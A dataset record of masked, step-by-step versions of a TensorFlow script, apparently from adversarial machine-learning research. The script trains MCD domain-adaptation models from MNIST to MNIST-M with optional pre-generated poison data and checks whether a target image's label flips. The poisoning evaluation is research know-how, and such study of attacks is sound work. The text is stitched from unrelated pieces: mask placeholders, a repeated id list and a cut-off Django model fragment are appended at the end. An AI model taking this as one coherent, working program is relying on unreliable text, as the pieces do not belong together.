"step-2": "<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return loss\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\nparser.add_argument('--USE_POISON', type=int, default=1, help=\n 'POISON used or not')\n<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return loss\n\n\n<mask token>\nif USE_POISON:\n x_poison = np.load('data/' + METHOD + '_GENERATED_POISON_DATA.npy')\n y_poison = np.load('data/' + METHOD + '_GENERATED_POISON_LABELS.npy')\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\nfor epoch in range(EPOCHS):\n nb_batches_train = int(len(x_train_mnist) / BATCH_SIZE)\n if len(x_train_mnist) % BATCH_SIZE != 0:\n nb_batches_train += 1\n ind_shuf = np.arange(len(x_train_mnist))\n np.random.shuffle(ind_shuf)\n for batch in range(nb_batches_train):\n ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1 + batch),\n len(x_train_mnist)))\n ind_source = ind_shuf[ind_batch]\n ind_target = np.random.choice(len(x_train_mnistm), size=len(\n ind_source), replace=False)\n x_source_batch = x_train_mnist[ind_source]\n y_source_batch = y_train_mnist[ind_source]\n x_target_batch = x_train_mnistm[ind_target]\n train_step_erm(x_source_batch, y_source_batch)\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\n train_discrepancy_2(x_target_batch)\n if epoch % 20 == 0:\n print('Full training Poisoning:', USE_POISON, 'MNIST->MNIST_M:',\n epoch, 'METHOD:', METHOD, '\\n')\n print([eval_accuracy_main_cdan(x_target_test,\n y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for\n i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared\n [i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[\n i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n if USE_POISON:\n print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i],\n main_classifier_1[i]) for i in range(NUM_MODELS)])\n print('\\n')\n",
"step-4": "<mask token>\nsys.path.append('../')\n<mask token>\nparser = argparse.ArgumentParser(description='Training', formatter_class=\n argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--USE_POISON', type=int, default=1, help=\n 'POISON used or not')\nargs = parser.parse_args()\nUSE_POISON = bool(args.USE_POISON)\nMETHOD = 'mcd'\nIMG_WIDTH = 28\nIMG_HEIGHT = 28\nNCH = 3\nNUM_CLASSES_MAIN = 2\nNUM_CLASSES_DC = 2\nEPOCHS = 101\nBATCH_SIZE = 64\nPLOT_POINTS = 100\nNUM_MODELS = 5\nce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)\nshared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH,\n NCH]) for i in range(NUM_MODELS)]\nmain_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i],\n NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\nmain_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i],\n NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\noptimizer_shared = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for i in\n range(NUM_MODELS)]\noptimizer_main_classifier_1 = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for\n i in range(NUM_MODELS)]\noptimizer_main_classifier_2 = [tf.keras.optimizers.Adam(0.001, beta_1=0.5) for\n i in range(NUM_MODELS)]\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_discrepancy_2(target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) -\n tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n@tf.function\ndef train_step_erm(main_data, main_labels):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n gradients_shared = [tape.gradient(loss[i], shared[i].\n trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i]\n .trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return loss\n\n\nmnist = tf.keras.datasets.mnist\n(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all\n ) = mnist.load_data()\nx_train_mnist_all = np.stack((x_train_mnist_all,) * 3, axis=-1) / 255.0\nx_test_mnist_all = np.stack((x_test_mnist_all,) * 3, axis=-1) / 255.0\nmnistm = pkl.load(open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb'))\nx_train_mnistm_all = mnistm['train'] / 255.0\nx_test_mnistm_all = mnistm['test'] / 255.0\npicked_class = 3\npicked_class_next = 8\ntrain_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()\ntrain_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next\n ).flatten()\ntest_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()\ntest_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next\n ).flatten()\nx_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0,\n train_points_class_1])]\ny_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0,\n train_points_class_1])]\nx_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\ny_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\nx_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0,\n train_points_class_1])]\nx_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0,\n test_points_class_1])]\nzeros_train = np.argwhere(y_train_mnist == picked_class).flatten()\nones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()\nzeros_test = np.argwhere(y_test_mnist == picked_class).flatten()\nones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()\ny_train_mnist[zeros_train] = 0\ny_train_mnist[ones_train] = 1\ny_test_mnist[zeros_test] = 0\ny_test_mnist[ones_test] = 1\ny_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)\ny_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)\nx_target_test = np.load('data/' + METHOD + '_TARGET_DATA.npy')\ny_target_test = np.load('data/' + METHOD + '_TARGET_LABEL.npy')\ny_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])\ntarget_correct_label = np.argmax(y_target_test, 1).flatten()[0]\ny_target_test_incorrect_label[0][(target_correct_label + 1) % NUM_CLASSES_MAIN\n ] = 1\nif USE_POISON:\n x_poison = np.load('data/' + METHOD + '_GENERATED_POISON_DATA.npy')\n y_poison = np.load('data/' + METHOD + '_GENERATED_POISON_LABELS.npy')\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\nfor epoch in range(EPOCHS):\n nb_batches_train = int(len(x_train_mnist) / BATCH_SIZE)\n if len(x_train_mnist) % BATCH_SIZE != 0:\n nb_batches_train += 1\n ind_shuf = np.arange(len(x_train_mnist))\n np.random.shuffle(ind_shuf)\n for batch in range(nb_batches_train):\n ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1 + batch),\n len(x_train_mnist)))\n ind_source = ind_shuf[ind_batch]\n ind_target = np.random.choice(len(x_train_mnistm), size=len(\n ind_source), replace=False)\n x_source_batch = x_train_mnist[ind_source]\n y_source_batch = y_train_mnist[ind_source]\n x_target_batch = x_train_mnistm[ind_target]\n train_step_erm(x_source_batch, y_source_batch)\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\n train_discrepancy_2(x_target_batch)\n if epoch % 20 == 0:\n print('Full training Poisoning:', USE_POISON, 'MNIST->MNIST_M:',\n epoch, 'METHOD:', METHOD, '\\n')\n print([eval_accuracy_main_cdan(x_target_test,\n y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for\n i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared\n [i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[\n i], main_classifier_1[i]) for i in range(NUM_MODELS)])\n if USE_POISON:\n print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i],\n main_classifier_1[i]) for i in range(NUM_MODELS)])\n print('\\n')\n",
"step-5": "import sys\r\nsys.path.append(\"../\")\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom utils import eval_accuracy_main_cdan\r\nfrom models import mnist2mnistm_shared_discrepancy, mnist2mnistm_predictor_discrepancy\r\nimport keras\r\nimport argparse\r\nimport pickle as pkl \r\n\r\nparser = argparse.ArgumentParser(description='Training', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\nparser.add_argument('--USE_POISON', type=int, default=1, help='POISON used or not')\r\nargs = parser.parse_args()\r\nUSE_POISON = bool(args.USE_POISON)\r\nMETHOD = \"mcd\"\r\n\r\nIMG_WIDTH = 28\r\nIMG_HEIGHT = 28\r\nNCH = 3\r\n\r\nNUM_CLASSES_MAIN = 2\r\nNUM_CLASSES_DC = 2\r\n\r\nEPOCHS = 101\r\nBATCH_SIZE = 64\r\nPLOT_POINTS = 100\r\n\r\nNUM_MODELS = 5\r\n\r\nce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)\r\n\r\nshared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH, NCH]) for i in range(NUM_MODELS)]\r\n\r\nmain_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]#48*4*4, 500\r\nmain_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]\r\n\r\noptimizer_shared = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\n\r\noptimizer_main_classifier_1 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\noptimizer_main_classifier_2 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]\r\n\r\n@tf.function\r\ndef train_discrepancy_1(main_data, main_labels, target_data):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n main_loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]\r\n \r\n shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for i in range(NUM_MODELS)]\r\n \r\n loss = [main_loss[i] - adv_loss[i] for i in range(NUM_MODELS)]\r\n \r\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]\r\n \r\n [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return adv_loss\r\n\r\n@tf.function\r\ndef train_discrepancy_2(target_data):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\r\n \r\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]\r\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return adv_loss\r\n\r\n\r\n@tf.function\r\ndef train_step_erm(main_data, main_labels):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]\r\n\r\n gradients_shared = [tape.gradient(loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]\r\n \r\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return loss\r\n\r\nmnist = tf.keras.datasets.mnist\r\n(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all) = mnist.load_data()\r\n\r\nx_train_mnist_all = np.stack((x_train_mnist_all,)*3, axis=-1)/255.\r\nx_test_mnist_all = np.stack((x_test_mnist_all,)*3, axis=-1)/255.\r\n\r\nmnistm = pkl.load(open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb'))\r\nx_train_mnistm_all = mnistm['train']/255.\r\nx_test_mnistm_all = mnistm['test']/255.\r\n\r\npicked_class = 3\r\npicked_class_next = 8\r\n\r\ntrain_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()\r\ntrain_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next).flatten()\r\n\r\ntest_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()\r\ntest_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next).flatten()\r\n\r\nx_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\ny_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\n\r\nx_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\ny_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\n\r\nx_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\nx_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\n\r\nzeros_train = np.argwhere(y_train_mnist == picked_class).flatten()\r\nones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()\r\nzeros_test = np.argwhere(y_test_mnist == picked_class).flatten()\r\nones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()\r\n\r\ny_train_mnist[zeros_train] = 0\r\ny_train_mnist[ones_train] = 1\r\ny_test_mnist[zeros_test] = 0\r\ny_test_mnist[ones_test] = 1\r\n\r\ny_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)\r\ny_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)\r\n\r\nx_target_test = np.load(\"data/\" + METHOD + \"_TARGET_DATA.npy\")\r\ny_target_test = np.load(\"data/\" + METHOD + \"_TARGET_LABEL.npy\")\r\ny_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])\r\ntarget_correct_label = np.argmax(y_target_test,1).flatten()[0]\r\ny_target_test_incorrect_label[0][(target_correct_label+1)%NUM_CLASSES_MAIN]=1\r\n\r\nif USE_POISON:\r\n\r\n x_poison = np.load(\"data/\" + METHOD + \"_GENERATED_POISON_DATA.npy\")\r\n y_poison = np.load(\"data/\" + METHOD + \"_GENERATED_POISON_LABELS.npy\") \r\n\r\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\r\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\r\n \r\nfor epoch in range(EPOCHS):\r\n nb_batches_train = int(len(x_train_mnist)/BATCH_SIZE)\r\n if len(x_train_mnist) % BATCH_SIZE != 0:\r\n nb_batches_train += 1\r\n ind_shuf = np.arange(len(x_train_mnist))\r\n np.random.shuffle(ind_shuf)\r\n \r\n for batch in range(nb_batches_train):\r\n ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1+batch), len(x_train_mnist)))\r\n ind_source = ind_shuf[ind_batch]\r\n \r\n ind_target = np.random.choice(len(x_train_mnistm), size=len(ind_source), replace=False)\r\n \r\n x_source_batch = x_train_mnist[ind_source]\r\n y_source_batch = y_train_mnist[ind_source]\r\n \r\n x_target_batch = x_train_mnistm[ind_target]\r\n \r\n train_step_erm(x_source_batch, y_source_batch)\r\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\r\n train_discrepancy_2(x_target_batch)\r\n \r\n if epoch % 20 == 0: \r\n print(\"Full training Poisoning:\", USE_POISON, \"MNIST->MNIST_M:\", epoch, \"METHOD:\", METHOD, \"\\n\")\r\n print([eval_accuracy_main_cdan(x_target_test, y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n if USE_POISON:\r\n print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print(\"\\n\")\r\n \r\n",
"step-ids": [
1,
3,
4,
5,
7
]
}
|
[
1,
3,
4,
5,
7
] |
from django.db import models
import os
from uuid import uuid4
class Card_profile(models.Model):
def path_and_rename(self, filename):
upload_to = 'uploads'
ext = filename.split('.')[-1]
